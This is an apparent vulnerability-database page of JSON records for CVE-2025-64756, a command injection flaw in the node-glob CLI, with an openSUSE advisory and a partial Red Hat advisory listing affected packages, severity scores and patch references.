Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-64756 (GCVE-0-2025-64756)
Vulnerability from cvelistv5 – Published: 2025-11-17 17:29 – Updated: 2025-11-19 02:30- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64756",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-17T18:24:55.363466Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-18T16:37:11.917Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "node-glob",
"vendor": "isaacs",
"versions": [
{
"status": "affected",
"version": "\u003e= 10.2.0, \u003c 10.5.0"
},
{
"status": "affected",
"version": "\u003e= 11.0.0, \u003c 11.1.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-19T02:30:44.520Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2"
},
{
"name": "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f"
},
{
"name": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146"
}
],
"source": {
"advisory": "GHSA-5j98-mcp5-4vw2",
"discovery": "UNKNOWN"
},
"title": "glob CLI: Command injection via -c/--cmd executes matches with shell:true"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64756",
"datePublished": "2025-11-17T17:29:08.029Z",
"dateReserved": "2025-11-10T22:29:34.874Z",
"dateUpdated": "2025-11-19T02:30:44.520Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-64756\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-17T18:15:58.270\",\"lastModified\":\"2025-12-02T19:34:43.270\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:isaacs:glob:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"10.2.0\",\"versionEndExcluding\":\"10.5.0\",\"matchCriteriaId\":\"3C8601DB-5326-473F-8AB9-6F66833AC884\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:isaacs:glob:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"11.0.0\",\"versionEndExcluding\":\"11.1.0\",\"matchCriteriaId\":\"F7828865-293E-4DB7-AC94-A3C1027E25A1\"}]}]}],\"references\":[{\"url\":\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64756\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-17T18:24:55.363466Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-18T16:37:07.785Z\"}}], \"cna\": {\"title\": \"glob CLI: Command injection via -c/--cmd executes matches with shell:true\", \"source\": {\"advisory\": \"GHSA-5j98-mcp5-4vw2\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"isaacs\", \"product\": \"node-glob\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 10.2.0, \u003c 10.5.0\"}, {\"status\": \"affected\", \"version\": \"\u003e= 11.0.0, \u003c 11.1.0\"}]}], \"references\": [{\"url\": \"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\", \"name\": \"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\", \"name\": \"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146\", \"name\": \"https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-19T02:30:44.520Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-64756\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-19T02:30:44.520Z\", \"dateReserved\": \"2025-11-10T22:29:34.874Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-17T17:29:08.029Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
OPENSUSE-SU-2025:15775-1
Vulnerability from csaf_opensuse - Published: 2025-11-27 00:00 - Updated: 2025-11-27 00:00Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "opa-1.11.0-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the opa-1.11.0-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15775",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15775-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64756 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64756/"
}
],
"title": "opa-1.11.0-1.1 on GA media",
"tracking": {
"current_release_date": "2025-11-27T00:00:00Z",
"generator": {
"date": "2025-11-27T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15775-1",
"initial_release_date": "2025-11-27T00:00:00Z",
"revision_history": [
{
"date": "2025-11-27T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "opa-1.11.0-1.1.aarch64",
"product": {
"name": "opa-1.11.0-1.1.aarch64",
"product_id": "opa-1.11.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "opa-bash-completion-1.11.0-1.1.aarch64",
"product": {
"name": "opa-bash-completion-1.11.0-1.1.aarch64",
"product_id": "opa-bash-completion-1.11.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "opa-fish-completion-1.11.0-1.1.aarch64",
"product": {
"name": "opa-fish-completion-1.11.0-1.1.aarch64",
"product_id": "opa-fish-completion-1.11.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "opa-zsh-completion-1.11.0-1.1.aarch64",
"product": {
"name": "opa-zsh-completion-1.11.0-1.1.aarch64",
"product_id": "opa-zsh-completion-1.11.0-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "opa-1.11.0-1.1.ppc64le",
"product": {
"name": "opa-1.11.0-1.1.ppc64le",
"product_id": "opa-1.11.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "opa-bash-completion-1.11.0-1.1.ppc64le",
"product": {
"name": "opa-bash-completion-1.11.0-1.1.ppc64le",
"product_id": "opa-bash-completion-1.11.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "opa-fish-completion-1.11.0-1.1.ppc64le",
"product": {
"name": "opa-fish-completion-1.11.0-1.1.ppc64le",
"product_id": "opa-fish-completion-1.11.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "opa-zsh-completion-1.11.0-1.1.ppc64le",
"product": {
"name": "opa-zsh-completion-1.11.0-1.1.ppc64le",
"product_id": "opa-zsh-completion-1.11.0-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "opa-1.11.0-1.1.s390x",
"product": {
"name": "opa-1.11.0-1.1.s390x",
"product_id": "opa-1.11.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "opa-bash-completion-1.11.0-1.1.s390x",
"product": {
"name": "opa-bash-completion-1.11.0-1.1.s390x",
"product_id": "opa-bash-completion-1.11.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "opa-fish-completion-1.11.0-1.1.s390x",
"product": {
"name": "opa-fish-completion-1.11.0-1.1.s390x",
"product_id": "opa-fish-completion-1.11.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "opa-zsh-completion-1.11.0-1.1.s390x",
"product": {
"name": "opa-zsh-completion-1.11.0-1.1.s390x",
"product_id": "opa-zsh-completion-1.11.0-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "opa-1.11.0-1.1.x86_64",
"product": {
"name": "opa-1.11.0-1.1.x86_64",
"product_id": "opa-1.11.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "opa-bash-completion-1.11.0-1.1.x86_64",
"product": {
"name": "opa-bash-completion-1.11.0-1.1.x86_64",
"product_id": "opa-bash-completion-1.11.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "opa-fish-completion-1.11.0-1.1.x86_64",
"product": {
"name": "opa-fish-completion-1.11.0-1.1.x86_64",
"product_id": "opa-fish-completion-1.11.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "opa-zsh-completion-1.11.0-1.1.x86_64",
"product": {
"name": "opa-zsh-completion-1.11.0-1.1.x86_64",
"product_id": "opa-zsh-completion-1.11.0-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-1.11.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-1.11.0-1.1.aarch64"
},
"product_reference": "opa-1.11.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-1.11.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-1.11.0-1.1.ppc64le"
},
"product_reference": "opa-1.11.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-1.11.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-1.11.0-1.1.s390x"
},
"product_reference": "opa-1.11.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-1.11.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-1.11.0-1.1.x86_64"
},
"product_reference": "opa-1.11.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-bash-completion-1.11.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.aarch64"
},
"product_reference": "opa-bash-completion-1.11.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-bash-completion-1.11.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.ppc64le"
},
"product_reference": "opa-bash-completion-1.11.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-bash-completion-1.11.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.s390x"
},
"product_reference": "opa-bash-completion-1.11.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-bash-completion-1.11.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.x86_64"
},
"product_reference": "opa-bash-completion-1.11.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-fish-completion-1.11.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.aarch64"
},
"product_reference": "opa-fish-completion-1.11.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-fish-completion-1.11.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.ppc64le"
},
"product_reference": "opa-fish-completion-1.11.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-fish-completion-1.11.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.s390x"
},
"product_reference": "opa-fish-completion-1.11.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-fish-completion-1.11.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.x86_64"
},
"product_reference": "opa-fish-completion-1.11.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-zsh-completion-1.11.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.aarch64"
},
"product_reference": "opa-zsh-completion-1.11.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-zsh-completion-1.11.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.ppc64le"
},
"product_reference": "opa-zsh-completion-1.11.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-zsh-completion-1.11.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.s390x"
},
"product_reference": "opa-zsh-completion-1.11.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opa-zsh-completion-1.11.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.x86_64"
},
"product_reference": "opa-zsh-completion-1.11.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-64756",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64756"
}
],
"notes": [
{
"category": "general",
"text": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:opa-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64756",
"url": "https://www.suse.com/security/cve/CVE-2025-64756"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:opa-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-bash-completion-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-fish-completion-1.11.0-1.1.x86_64",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.aarch64",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.ppc64le",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.s390x",
"openSUSE Tumbleweed:opa-zsh-completion-1.11.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-27T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-64756"
}
]
}
RHSA-2025:22905
Vulnerability from csaf_redhat - Published: 2025-12-09 10:09 - Updated: 2025-12-09 10:10Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The 1.19.4 GA release of Red Hat OpenShift Pipelines Operator..\nFor more details see [product documentation](https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines).",
"title": "Topic"
},
{
"category": "general",
"text": "The 1.19.4 release of Red Hat OpenShift Pipelines Operator.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:22905",
"url": "https://access.redhat.com/errata/RHSA-2025:22905"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-64756",
"url": "https://access.redhat.com/security/cve/CVE-2025-64756"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-6545",
"url": "https://access.redhat.com/security/cve/CVE-2025-6545"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-6547",
"url": "https://access.redhat.com/security/cve/CVE-2025-6547"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9287",
"url": "https://access.redhat.com/security/cve/CVE-2025-9287"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9288",
"url": "https://access.redhat.com/security/cve/CVE-2025-9288"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_pipelines"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_22905.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Pipelines Release 1.19.4",
"tracking": {
"current_release_date": "2025-12-09T10:10:48+00:00",
"generator": {
"date": "2025-12-09T10:10:48+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.13"
}
},
"id": "RHSA-2025:22905",
"initial_release_date": "2025-12-09T10:09:13+00:00",
"revision_history": [
{
"date": "2025-12-09T10:09:13+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-12-09T10:09:17+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-12-09T10:10:48+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Pipelines 1.19",
"product": {
"name": "Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_pipelines:1.19::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Pipelines"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"product_identification_helper": {
